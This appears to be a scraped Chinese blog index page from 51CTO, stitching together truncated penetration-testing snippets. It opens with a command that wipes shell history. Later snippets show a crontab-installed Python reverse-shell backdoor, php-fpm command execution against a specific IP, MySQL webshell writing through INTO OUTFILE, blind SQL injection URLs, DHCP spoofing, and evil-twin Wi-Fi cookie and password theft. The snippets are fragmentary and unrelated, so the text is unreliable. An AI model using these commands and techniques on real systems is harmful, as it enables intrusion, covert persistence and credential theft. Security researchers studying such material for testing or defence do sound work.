unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
这是一次内网渗透,为何标题不写内网呢,因为当时搞的时候不知道是内网,搞到一台主机之后才知道是双网卡,有对内的网卡,以为只是一次简单web渗透, 所以没必要夸大标题。 不会写的太详细,大概记录下流程1、突破口 通过内部扫描器没有什么服务器方面漏洞,只有一些信息泄漏,调试信息等,根本对这次的渗透起不到关键的作用,当时看了几天没
接口穷举dns域传送搜索引擎抓取 通过这几种方法获取之后进行去重,之后在获取c段域名,如有二级域名抓取出来。需要解决的问题穷举的时的dns泛解析的问题
<html> <body> <p><b>Notes:</b></p> <hr> <ul> <li>Select the database you want to use</li> <li>Write 
提供了RDP、VNC、XDMCP、SSH等远程连接协议的支持
findpass http://www.xfocus.net/tools/200307/445.html
#author: orangleliu date: 2014-11-12 #python2.7.x ip_scaner.py ''' 不同平台,实现对所在内网端的ip扫描 有时候需要知道所在局域网的有效ip,但是又不想找特定的工具来扫描。 使用方法 python ip_scaner.py 192.16
fastcgi php-fpm 端口对外开放 外部提交的命令可以执行https://github.com/adoy/PHP-FastCGI-Clientlocal/php/bin/php fcgiget.php 222.134.66.98:9000/etc/hosts
https://svn.nmap.org/nmap/scripts/memcached-info.nsenmap -p 11211 --script memcached-info
WPScan使用方法:基于Kali Linux1.获取基本信息wpscan –url www.JeeHsu.com2.扫描插件基本信息wpscan –url www.JeeHsu.com –enumerate p3.扫描容易受攻击的插件wpscan –url www.JeeHsu.com –enumerate vp4.扫描所有插件wpscan –url www.Je
寻找内网主机被入侵的方法1.流量审计 流量审计基于白名单ip,异常流量。2.日志审计 日志审计有客户端,客户端回传各种日志,进行本地分析3.行为审计 行为审计有客户端, 客户端回传行为日志。
1.下载ez_setup.py http://peak.telecommunity.com/dist/ez_setup.py 下载到本地执行 执行成会在Python的安装目录出现Script的目录。2.设置环境变量 把pyhton\Scripts添加到Path环境变量。
Mongodb下载:http://nmap.org/svn/scripts/mongodb-info.nsenmap -p 27017 --script mongodb-info <ip>Redis下载:https://svn.nmap.org/nmap/scripts/redis-info.nsenmap -p 6379 --script redis-info  
WPscanhttp://code.google.com/p/wpscan/root@bt5:/tmp# svn checkout http://wpscan.googlecode.com/svn/trunk/ ./wpscanroot@bt5:/tmp# apt-get install libcurl4-gnutls-devroot@bt5:/tmp# gem install --user-in
相比于其它代理,好处是跨平台,只要目标主机装有java,就可以正常使用。不过移动设备我没有测试过,有兴趣的同学可以找个移动设备试试。javaproxy 官方网站:官方说明 http://www.me.lv/jp/manual.htmljavaproxy代理可实现端口反弹代理,多级代理。代理支持http,https,ftp以及socks。由于大部分肉鸡是在内网的,并没对外网开放多余端口,故反向代理是
icmp ping baidu.comhttp curl -i baidu.comtcp telnet baidu.comdns nslookup baidu.com
dhcp洪水攻击 也就是说设置的分配地址是1-100 伪造去请求dhcp这样的话 dhcp服务器就会瘫痪 挂掉。dhcp伪造攻击 在内网建dhcp服务器 A机器连接进来 广播Discouer报文寻找dhcp服务器 这时候我们伪造的dhcp服务器 快速发包 让A机器获取到我们这边的DHCP DHCP的中的DNS可控 我们可以进行log记录
今天跟老板去提离职,记录下。
airbase-ngHostAPd bridge NATairssl.sh 集成3vilTwinAttacker 集成 数据全部走本机 抓包即可抓取数据 DNS可控 那么可以做DNS代理 之后插入JS来获取密码 偷cookie等。
21 ftp 匿名访问 站库分离进行下载文件22 ssh 端口转发 代理25 smtp 伪造源地址漏洞110 POP3135 RPC 139 445 &nb
条件:存在匿名访问NFS目录列举方法1:nmap -script=nfs-ls.nse 127.0.0.1方法2. 挂载到本地 mount -t nfs 192.168.0.1:/export/home /tmp/badperms 为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperm
TCP反弹后门//python版本,kali下面测试成功,tcp 8080: (crontab -l;printf "*/5 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(sock
做项目遇到Referer绕过的情况 有同事问起 这几天不是很忙 就把自己知道的方法记录下。有条件限制 不一定所有的Refere验证就可以绕过1.Refere为空条件下解决方案: 利用ftp://,http://,https://,file://,javascript:,data:这个时候浏览器地址栏是file://开头的,如果这个HTML页面向任何http站点提交请求的话
mysql 3.x拿webshell先建表 字段 写入一句话查询导出一句话mysql> use mysqlDatabase changedmysql> Create TABLE demo (sanr text NOT NULL);Query OK, 0 rows affected (0.00 sec)mysql> Insert INTO demo (sanr) VALU
满足条件mysql未降权 未关闭file权限gpc关闭LIMIT 0,1 INTO OUTFILE '这里是路径' LINES TERMINATED BY '这里是你想写的内容'--SELECT * FROM `user` where user='root' LIMIT 0,1 INTO OUTFILE 'D:/xxxxx/demo.txt' LINES TERMINATED BY '
$include_file 可控,可以上传文件, 上传后缀限制为jpg,gif,png,包含后缀限制必须为.phpallow_url_include=Off (不考虑远程包含)if ( isset( $include_file ) && strtolower( substr( $include_file
http://www.x.com/sections_intr.php?id=181 and length((database()))=4http://www.x.com/sections_intr.php?id=181 and ascii(substring((database()),1,1))=122 http://www.x.com/sections_intr.php?
window下除了 空格 小数点可以绕过 还可以利用nfs ads数据流来绕过
常见的网络监控模式可以分为两种:一种是旁路监控模式,另一种是串联监控模式。“旁路监控模式”一般是指通过交换机等网络设备的“端口镜像”功能来实现监控,在此模式下,监控设备只需要连接到交换机的指定镜像端口,所以形象的称之为“旁路监控”。而串联模式一般是通过网关、网桥或者代理服务器的模式来进行监控,由于监控设备做为网关或者网桥串联在网络中,所以称之为“串联监控模式”。旁路模式的优缺点优点:旁路监控模式部
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号